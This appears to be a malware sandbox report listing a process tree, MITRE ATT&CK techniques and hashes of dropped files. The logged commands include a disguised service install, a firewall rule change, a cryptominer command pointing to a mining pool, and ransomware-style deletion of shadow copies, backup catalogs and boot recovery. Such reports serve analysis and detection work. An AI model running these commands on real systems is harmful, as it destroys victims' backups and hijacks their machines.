                                                                                        PID:5024
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\jlepwesi.exe" C:\Windows\SysWOW64\udaucqm\
                                                                                        2⤵
                                                                                          PID:4912
                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                          "C:\Windows\System32\sc.exe" create udaucqm binPath= "C:\Windows\SysWOW64\udaucqm\jlepwesi.exe /d\"C:\Users\Admin\AppData\Local\Temp\BF64.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                          2⤵
                                                                                            PID:4732
                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                            "C:\Windows\System32\sc.exe" description udaucqm "wifi internet conection"
                                                                                            2⤵
                                                                                              PID:344
                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                              "C:\Windows\System32\sc.exe" start udaucqm
                                                                                              2⤵
                                                                                                PID:4792
                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                2⤵
                                                                                                  PID:4224
                                                                                              • C:\Users\Admin\AppData\Local\Temp\C755.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\C755.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:4884
                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                1⤵
                                                                                                  PID:4568
                                                                                                • C:\Windows\explorer.exe
                                                                                                  C:\Windows\explorer.exe
                                                                                                  1⤵
                                                                                                    PID:1432
                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                    1⤵
                                                                                                      PID:3908
                                                                                                    • C:\Windows\explorer.exe
                                                                                                      C:\Windows\explorer.exe
                                                                                                      1⤵
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      PID:4300
                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                      1⤵
                                                                                                        PID:1808
                                                                                                      • C:\Windows\explorer.exe
                                                                                                        C:\Windows\explorer.exe
                                                                                                        1⤵
                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                        PID:1344
                                                                                                      • C:\Windows\SysWOW64\udaucqm\jlepwesi.exe
                                                                                                        C:\Windows\SysWOW64\udaucqm\jlepwesi.exe /d"C:\Users\Admin\AppData\Local\Temp\BF64.exe"
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:2760
                                                                                                        • C:\Windows\SysWOW64\svchost.exe
                                                                                                          svchost.exe
                                                                                                          2⤵
                                                                                                          • Drops file in System32 directory
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:1512
                                                                                                          • C:\Windows\SysWOW64\svchost.exe
                                                                                                            svchost.exe -o masari.miner.rocks:30162 -u 9rqX2BQ6Z4teAkaSqGBWvPZEM7bAtidewXXjYz86pVgKUQqDHeUqjy55fXt2fJAaJkPBteXWhptFqJVSr132QxsSSGfMCgw.50000 -p w=a -k -a cn/half
                                                                                                            3⤵
                                                                                                              PID:4492
                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                          1⤵
                                                                                                            PID:4652
                                                                                                          • C:\Windows\explorer.exe
                                                                                                            C:\Windows\explorer.exe
                                                                                                            1⤵
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            PID:4572
                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4352
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\F358.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\F358.exe
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Enumerates connected drives
                                                                                                            PID:1432
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 756
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:3024
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 840
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:4168
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 844
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:4768
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 892
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:3688
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 812
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:4308
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 1092
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:2200
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 1104
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:3916
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 1484
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:4524
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 1508
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:4892
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 1416
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:2972
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 1720
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:4496
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 1524
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:3752
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 1648
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:4716
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 1404
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              PID:3872
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\F358.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\F358.exe" -agent 0
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Drops file in Program Files directory
                                                                                                              • Drops file in Windows directory
                                                                                                              PID:1796
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                                                                                                              2⤵
                                                                                                                PID:4736
                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                  wmic shadowcopy delete
                                                                                                                  3⤵
                                                                                                                    PID:4912
                                                                                                                  • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                    vssadmin delete shadows /all /quiet
                                                                                                                    3⤵
                                                                                                                    • Interacts with shadow copies
                                                                                                                    PID:4752
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                                  2⤵
                                                                                                                    PID:4660
                                                                                                                    • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                      vssadmin delete shadows /all /quiet
                                                                                                                      3⤵
                                                                                                                      • Interacts with shadow copies
                                                                                                                      PID:4524
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                    2⤵
                                                                                                                      PID:2996
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                      2⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:4712
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                                      2⤵
                                                                                                                        PID:4832
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                        2⤵
                                                                                                                          PID:4332
                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                            wmic shadowcopy delete
                                                                                                                            3⤵
                                                                                                                              PID:2228
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 1816
                                                                                                                            2⤵
                                                                                                                            • Program crash
                                                                                                                            PID:4104
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1432 -s 1800
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Program crash
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            PID:4016
                                                                                                                          • C:\Windows\SysWOW64\notepad.exe
                                                                                                                            notepad.exe
                                                                                                                            2⤵
                                                                                                                              PID:4276
                                                                                                                          • C:\Windows\system32\vssvc.exe
                                                                                                                            C:\Windows\system32\vssvc.exe
                                                                                                                            1⤵
                                                                                                                              PID:4152
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                              1⤵
                                                                                                                                PID:4340
                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                1⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                PID:4308
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\5AE1.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\5AE1.exe
                                                                                                                                1⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:2456
                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                1⤵
                                                                                                                                • Drops file in Windows directory
                                                                                                                                • Modifies registry class
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:2276
                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                1⤵
                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                PID:2228
                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                1⤵
                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:3276
                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                1⤵
                                                                                                                                • Modifies registry class
                                                                                                                                PID:632

                                                                                                                              Network

                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                              Persistence

                                                                                                                              New Service

                                                                                                                              1
                                                                                                                              T1050

                                                                                                                              Modify Existing Service

                                                                                                                              1
                                                                                                                              T1031

                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                              2
                                                                                                                              T1060

                                                                                                                              BITS Jobs

                                                                                                                              1
                                                                                                                              T1197

                                                                                                                              Privilege Escalation

                                                                                                                              New Service

                                                                                                                              1
                                                                                                                              T1050

                                                                                                                              Defense Evasion

                                                                                                                              Disabling Security Tools

                                                                                                                              1
                                                                                                                              T1089

                                                                                                                              Modify Registry

                                                                                                                              5
                                                                                                                              T1112

                                                                                                                              File Deletion

                                                                                                                              2
                                                                                                                              T1107

                                                                                                                              BITS Jobs

                                                                                                                              1
                                                                                                                              T1197

                                                                                                                              Install Root Certificate

                                                                                                                              1
                                                                                                                              T1130

                                                                                                                              Credential Access

                                                                                                                              Credentials in Files

                                                                                                                              3
                                                                                                                              T1081

                                                                                                                              Discovery

                                                                                                                              Software Discovery

                                                                                                                              1
                                                                                                                              T1518

                                                                                                                              Query Registry

                                                                                                                              5
                                                                                                                              T1012

                                                                                                                              System Information Discovery

                                                                                                                              5
                                                                                                                              T1082

                                                                                                                              Security Software Discovery

                                                                                                                              1
                                                                                                                              T1063

                                                                                                                              Peripheral Device Discovery

                                                                                                                              2
                                                                                                                              T1120

                                                                                                                              Remote System Discovery

                                                                                                                              1
                                                                                                                              T1018

                                                                                                                              Collection

                                                                                                                              Data from Local System

                                                                                                                              3
                                                                                                                              T1005

                                                                                                                              Command and Control

                                                                                                                              Web Service

                                                                                                                              1
                                                                                                                              T1102

                                                                                                                              Impact

                                                                                                                              Inhibit System Recovery

                                                                                                                              2
                                                                                                                              T1490

                                                                                                                              Replay Monitor

                                                                                                                              Loading Replay Monitor...

                                                                                                                              Downloads

                                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                MD5

                                                                                                                                7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                SHA1

                                                                                                                                804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                SHA256

                                                                                                                                bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                SHA512

                                                                                                                                49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                MD5

                                                                                                                                7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                SHA1

                                                                                                                                804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                SHA256

                                                                                                                                bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                SHA512

                                                                                                                                49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                              • C:\Program Files\Windows Multimedia Platform\TCWWZRVKWR\ultramediaburner.exe
                                                                                                                                MD5

                                                                                                                                6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                SHA1

                                                                                                                                938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                SHA256

                                                                                                                                b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                SHA512

                                                                                                                                a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                              • C:\Program Files\Windows Multimedia Platform\TCWWZRVKWR\ultramediaburner.exe
                                                                                                                                MD5

                                                                                                                                6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                SHA1

                                                                                                                                938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                SHA256

                                                                                                                                b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                SHA512

                                                                                                                                a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                              • C:\Program Files\install.dat
                                                                                                                                MD5

                                                                                                                                31e4a5735b20be6a53cbb552663b1cc3

                                                                                                                                SHA1

                                                                                                                                c080a61b65a34928a1fb1899db8a3698a4892a4c

                                                                                                                                SHA256

                                                                                                                                b28936c7d89e33fdc4eace2d0e92ed7d3b02bbfc5e7c8297d16f721d0254305f

                                                                                                                                SHA512

                                                                                                                                3e98a84f11ca1eb27e894ce6ac7c6ff6c37382459a467ef30a87bfe36149960c5c76f2beeb9415ab3287f002012e65c4f754dcd17045986306c6afab399a0604

                                                                                                                              • C:\Program Files\install.dll
                                                                                                                                MD5

                                                                                                                                fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                                SHA1

                                                                                                                                6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                                SHA256

                                                                                                                                9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                                SHA512

                                                                                                                                0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                                                                                                MD5

                                                                                                                                e71a0a7e48b10bde0a9c54387762f33e

                                                                                                                                SHA1

                                                                                                                                fed75947f1163b00096e24a46e67d9c21e7eeebd

                                                                                                                                SHA256

                                                                                                                                83d7be67d0eb544d655cc8e8eb687c26f772d6a40ebf8394e5c12b248976a2de

                                                                                                                                SHA512

                                                                                                                                394c25daef6143de894505189b1edcdffb82fd6ab9de1c9e43865fb790803ff5c384debfe16236d4a9d95a78d3eea548d3cef332ed5a6881ac9c50d252c3c34a

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                MD5

                                                                                                                                094ce215d6b33ca5219d27c3f038f839

                                                                                                                                SHA1

                                                                                                                                c9cb7cd17a910be377247e390c9cbbb9fd4dffaa

                                                                                                                                SHA256

                                                                                                                                05207541893c6bdd5bcac077818fd838229e37d2e28a5a8ecaaf97c08eb69bc1

                                                                                                                                SHA512

                                                                                                                                123d55469cffab5847be24546e7b1078faafa182b41d8766d50ace91f192068f3f1c467e1479a7ead7d168ab74f6f043bd9602742b01ce6894c18550d36d2b07

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                MD5

                                                                                                                                d484640de66d4763e03d1631f003aa64

                                                                                                                                SHA1

                                                                                                                                e9e6cb28087e4834cb262510899247fbaf8b052c

                                                                                                                                SHA256

                                                                                                                                e5b9f81ca72fc6d7ef2e717f06fc0841ae57c85bbae11dedde71d97b0829f8ee

                                                                                                                                SHA512

                                                                                                                                a82377c61a60dc47df45f2b386755a5005d2e7138c27ab48097865af061d6de7c9f8493cd1b93001e0603636855c764df97746d5a685967872a29c077a76bed5

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                MD5

                                                                                                                                2f358b704cffd401c683955fd2fd8068

                                                                                                                                SHA1

                                                                                                                                6444ad7d34cb78f620241abf00f7e59e2a803528

                                                                                                                                SHA256

                                                                                                                                297825b3c7179293b7e4a1d86d89ebac1f327cfc5f01b13817c702639da857c7

                                                                                                                                SHA512

                                                                                                                                c33f7977075056e5bdd3efc808d997546fbebed29fb9af6d2942478c0d3293bcdc150a8fac8f218aa32f9c055466ff2714091ec1699bb23710583cc7f8812a5e

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                MD5

                                                                                                                                2a2df6c38766351fcdd6bdbce579166e

                                                                                                                                SHA1

                                                                                                                                b3156fc0ea9eed1d196b87508b1a15a18c279fe8

                                                                                                                                SHA256

                                                                                                                                237695f5c48c247547e143c180dd055dcd79c28c92cc32c5333f27634aeff185

                                                                                                                                SHA512

                                                                                                                                a9b7d1ab873ab5e5296f42c25db2d2a7e45898d5440c72bbaadc998dec069486e64a105ad0847e89624ca6aef801460a49e489aadd35808fe1e6c8dd74254558

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\30-2e7ed-cc8-6ff89-4004065ef6923\Kyxazhibeda.exe
                                                                                                                                MD5

                                                                                                                                18e49540637bccc9b3a7ca3d48cae223

                                                                                                                                SHA1

                                                                                                                                b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                                                SHA256

                                                                                                                                698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                                                SHA512

                                                                                                                                a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\30-2e7ed-cc8-6ff89-4004065ef6923\Kyxazhibeda.exe
                                                                                                                                MD5

                                                                                                                                18e49540637bccc9b3a7ca3d48cae223

                                                                                                                                SHA1

                                                                                                                                b5b5b9c981420929faa959c0ddf6831dfde6e9a6

                                                                                                                                SHA256

                                                                                                                                698471c960eaa5c2a1b439ac307ff96a5735680e3220d1d5e1fc75aa33c8a55b

                                                                                                                                SHA512

                                                                                                                                a33cc44d211c29442ed5ce61ff70b5469468853099f16209f3895d5b688349a72069044bee07d9d9dbe8339ff60d13d7b7df103ce1113ed1a34a78f04e68415e

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\30-2e7ed-cc8-6ff89-4004065ef6923\Kyxazhibeda.exe.config
                                                                                                                                MD5

                                                                                                                                98d2687aec923f98c37f7cda8de0eb19

                                                                                                                                SHA1

                                                                                                                                f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                                SHA256

                                                                                                                                8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                                SHA512

                                                                                                                                95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Tij30vfCfa.exe
                                                                                                                                MD5

                                                                                                                                dac476eb95c28c5cc52eabaf262ac97d

                                                                                                                                SHA1

                                                                                                                                b8f879f009decfa380dca47e24ce875f5a805d23

                                                                                                                                SHA256

                                                                                                                                4719cc518e90bc1bfe41169383fb4fdebe96f2d32cf7fb0fdc5fd10020262c0a

                                                                                                                                SHA512

                                                                                                                                276994d99584e031296373f467f506cf77da557c6f2ee9e9c6ee4c9ebd556ae5423fe55bb0f52398146441e23ea37bb51cc9eb59a856a9681c526e8c20f98ccc

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Tij30vfCfa.exe
                                                                                                                                MD5

                                                                                                                                dac476eb95c28c5cc52eabaf262ac97d

                                                                                                                                SHA1

                                                                                                                                b8f879f009decfa380dca47e24ce875f5a805d23

                                                                                                                                SHA256

                                                                                                                                4719cc518e90bc1bfe41169383fb4fdebe96f2d32cf7fb0fdc5fd10020262c0a

                                                                                                                                SHA512

                                                                                                                                276994d99584e031296373f467f506cf77da557c6f2ee9e9c6ee4c9ebd556ae5423fe55bb0f52398146441e23ea37bb51cc9eb59a856a9681c526e8c20f98ccc

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\biuqq42z.jxr\inst.exe
                                                                                                                                MD5

                                                                                                                                edd1b348e495cb2287e7a86c8070898d

                                                                                                                                SHA1

                                                                                                                                682bf3f9ff5aff794aabb7afe3e0c4eda528ce2a

                                                                                                                                SHA256

                                                                                                                                eeae077991dfe0fb739133c5ac0e10d02772f994173281dd41370c0aadf2fd81

                                                                                                                                SHA512

                                                                                                                                613e2c43ca9c4f7416f7450eaed58dcb58cd95cd82c55fc5212af788eed793f26beb4be38f850aa1009eddfd28372775236f36b36977e51512c41e1a9e619d72

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\biuqq42z.jxr\inst.exe
                                                                                                                                MD5

                                                                                                                                edd1b348e495cb2287e7a86c8070898d

                                                                                                                                SHA1

                                                                                                                                682bf3f9ff5aff794aabb7afe3e0c4eda528ce2a

                                                                                                                                SHA256

                                                                                                                                eeae077991dfe0fb739133c5ac0e10d02772f994173281dd41370c0aadf2fd81

                                                                                                                                SHA512

                                                                                                                                613e2c43ca9c4f7416f7450eaed58dcb58cd95cd82c55fc5212af788eed793f26beb4be38f850aa1009eddfd28372775236f36b36977e51512c41e1a9e619d72

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\c7-9a4ab-3df-47491-4ccefd56ffd44\Dakeshodujy.exe
                                                                                                                                MD5

                                                                                                                                2e91d25073151415f8c39de2262cbba8

                                                                                                                                SHA1

                                                                                                                                32544481a34273a1a870822152d201ea9c19b34d

                                                                                                                                SHA256

                                                                                                                                0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                                                                SHA512

                                                                                                                                306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\c7-9a4ab-3df-47491-4ccefd56ffd44\Dakeshodujy.exe
                                                                                                                                MD5

                                                                                                                                2e91d25073151415f8c39de2262cbba8

                                                                                                                                SHA1

                                                                                                                                32544481a34273a1a870822152d201ea9c19b34d

                                                                                                                                SHA256

                                                                                                                                0325c7bc34a7f7e418e3f7b081564d16aed6b3c2cf87bfdc914c3b5e4bed53e0

                                                                                                                                SHA512

                                                                                                                                306e7314d1944a273af9d8996eae7a0e7bb67e87325da42686fc85c55a8ddd055300425acae30d6f44c1257378eed3ca7876d6f5eec4efd47182ede973001e71

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\c7-9a4ab-3df-47491-4ccefd56ffd44\Dakeshodujy.exe.config
                                                                                                                                MD5

                                                                                                                                98d2687aec923f98c37f7cda8de0eb19

                                                                                                                                SHA1

                                                                                                                                f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                                SHA256

                                                                                                                                8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                                SHA512

                                                                                                                                95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\c7-9a4ab-3df-47491-4ccefd56ffd44\Kenessey.txt
                                                                                                                                MD5

                                                                                                                                97384261b8bbf966df16e5ad509922db

                                                                                                                                SHA1

                                                                                                                                2fc42d37fee2c81d767e09fb298b70c748940f86

                                                                                                                                SHA256

                                                                                                                                9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                                                SHA512

                                                                                                                                b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\exvhb4iz.vd1\instEU.exe
                                                                                                                                MD5

                                                                                                                                bdb62dc3502ea91f26181fa451bd0878

                                                                                                                                SHA1

                                                                                                                                bff5609cd44209ee1f07920b2103757792866d7a

                                                                                                                                SHA256

                                                                                                                                6b1dc06f68c7971c2dab6e0d01ed1691b3a400490cd2a1d6ce88c307d7566a3c

                                                                                                                                SHA512

                                                                                                                                12d94ef15f12268a2c849c18c06319b5796be4c11ffaa81c6a2e6356674842f075509acb08749219076a99e99179e2594541abe86e0c50e380b11fcc55375e5d

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\exvhb4iz.vd1\instEU.exe
                                                                                                                                MD5

                                                                                                                                bdb62dc3502ea91f26181fa451bd0878

                                                                                                                                SHA1

                                                                                                                                bff5609cd44209ee1f07920b2103757792866d7a

                                                                                                                                SHA256

                                                                                                                                6b1dc06f68c7971c2dab6e0d01ed1691b3a400490cd2a1d6ce88c307d7566a3c

                                                                                                                                SHA512

                                                                                                                                12d94ef15f12268a2c849c18c06319b5796be4c11ffaa81c6a2e6356674842f075509acb08749219076a99e99179e2594541abe86e0c50e380b11fcc55375e5d

